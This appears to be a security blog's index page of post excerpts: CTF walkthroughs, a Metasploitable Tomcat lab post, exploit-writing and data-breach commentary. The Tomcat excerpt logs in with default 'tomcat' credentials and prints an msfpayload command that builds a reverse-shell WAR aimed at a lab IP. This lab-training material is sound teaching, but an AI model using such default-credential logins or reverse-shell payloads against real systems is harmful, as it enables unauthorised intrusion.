CSAW 2014 walkthrough – Fluffy No More

Fluffy No More was a Forensics 300 point challenge at CSAW 2014. The backstory seemed kind of funny and I thought I’d give it a shot!

fluffy no more challenge

Setup

The attached tarball contained a few additional tarballs:

  • Full /etc directory contents
  • Full /var/log directory contents
  • Full /var/www directory contents
  • A MySQL database dump file

The task was to determine the attacker’s ingress point as well as discover a key for the CTF challenge. I cover both points in the sections below.

CSAW 2014 walkthrough – pybabbies

pybabbies was an Exploitation 200 challenge during the CTF and I got “voluntold” to work on this one by my team mates since I have a strong Python background. The night was young and I felt pretty good about it, so I took a look.

pybabbies challenge

Setting the scene

Connecting to that IP/port with netcat revealed a shell prompt indicating that I had connected to a Python sandbox environment. Python sandboxes are nothing new, and I had actually recently done some reading on a sandbox challenge from an older CTF writeup so I felt pretty good about what I was getting myself in to.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

1409539753_thumb.png
So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

Enumerator PIP install is live

Great news! After collaborating with felux(@sugarstackio) of http://sugarstack.io  in #overflowsec. Im excited that enumerator is now a pip install within python! Woohoo!

More information can be obtained at Enumerator PIP. Give it a once over, its an easy install now.

Thanks felux for all of the hard work, the project is coming along great. Look for more updates in the future.

Simple Buffer Overflow bypassing SEH

Here recently, I have gotten more interested in exploit writing, and the entire process of it. Being that I am noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally got it figured out, I wanted to share with the world! 😀

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot.  There is no reason to believe only some stores were effected, and chances are the breach is spread across the companies 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014.  If that is the case, we need to think of the impact this could have.  If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debt cards.

New Video Series

We are excited to announce we have started production on our first video series!  “Metasploitable without Metasploit”  The focus of this video series it to teach the up and coming InfoSec student how to manually exploit Metasploitable.  This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way.  This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

Shaws and Star Market Data Breach – What You Need To Know

So yes yet again we are faced with another data breach of a major chain of retail stores. This time it is Shaws and Star Market. These companies are owned by Albertsons.

At this point the details have not been released. It would appear that the Point of Sale (POS) system was probably targeted to steal the customer information.

So what did they get? Allegedly they have Names,Expiration Dates, Card Numbers, Pin Numbers (Unclear), and 3 digit security codes. Customers that shopped at Shaws and Star Markets between June 22 and July 17 should keep a close eye on their bank accounts and report any discrepancies to their financial institutions.

Tr0ll

Having just finished the OSCP labs (exam is next week), I needed something to keep my mind to working, and do something a little fun. Naturally, I turned to Vulnhub.com to download a vulnerable VM and keep my geek appetite satisfied. Prior to starting the OSCP course, I frequented Vulnhub as a way to “prepare” me for the labs during the course. (Its obviously a good start, but nothing can prepare you for those, just FYI).

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.